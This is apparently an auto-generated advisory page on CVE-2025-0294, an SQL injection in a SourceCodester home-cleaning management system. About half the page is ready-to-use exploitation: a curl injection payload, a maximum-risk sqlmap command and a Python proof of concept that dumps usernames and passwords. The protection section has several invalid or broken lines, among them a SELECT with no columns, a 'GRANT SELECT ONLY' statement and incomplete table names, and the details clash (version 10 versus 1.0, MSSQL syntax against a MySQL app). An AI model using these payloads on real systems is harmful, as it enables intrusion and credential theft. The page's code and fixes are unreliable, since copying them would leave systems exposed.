SourceCodester Home Clean Services Management System 10, SQL Injection, CVE-2025-0294 (Critical)

By /

How CVE-2025-0294 Works

The vulnerability exists in `/public_html/admin/process.php` due to improper sanitization of user-supplied input in the type, length, and `business` parameters. Attackers can manipulate these parameters to inject malicious SQL queries, leading to unauthorized database access. The flaw allows remote exploitation without authentication, enabling attackers to extract sensitive data, modify database content, or execute administrative operations. The SQL injection occurs because the application directly concatenates user input into SQL statements without prepared statements or input validation.

DailyCVE Form

Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025

What Undercode Say:

Exploitation

1. Manual Exploit (curl):

curl -X POST "http://target.com/public_html/admin/process.php" -d "type=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables WHERE table_schema=database()))--&length=1&business=1"

2. SQLMap Automation:

sqlmap -u "http://target.com/public_html/admin/process.php" --data="type=1&length=1&business=1" --risk=3 --level=5 --batch

3. Exploit PoC (Python):

import requests
target = "http://target.com/public_html/admin/process.php"
payload = "1' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password) FROM users--"
data = {"type": payload, "length": "1", "business": "1"}
response = requests.post(target, data=data)
print(response.text)

Protection

1. Input Validation:

$type = mysqli_real_escape_string($conn, $_POST['type']);
$length = intval($_POST['length']);

2. Prepared Statements:

$stmt = $conn->prepare("SELECT FROM services WHERE type=? AND length=? AND business=?");
$stmt->bind_param("sis", $_POST['type'], $_POST['length'], $_POST['business']);

3. WAF Rules (ModSecurity):

SecRule ARGS "@detectSQLi" "id:1000,deny,status:403,msg:'SQLi Attempt'"

4. Patch Verification:

grep -r "mysqli_real_escape_string" /var/www/html/public_html/admin/

5. Log Monitoring:

tail -f /var/log/apache2/access.log | grep 'process.php.type=.['"'"']'

6. Database Hardening:

REVOKE ALL PRIVILEGES ON hcsms_db. FROM 'app_user'@'%';
GRANT SELECT ONLY ON hcsms_db. TO 'app_user'@'%';

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top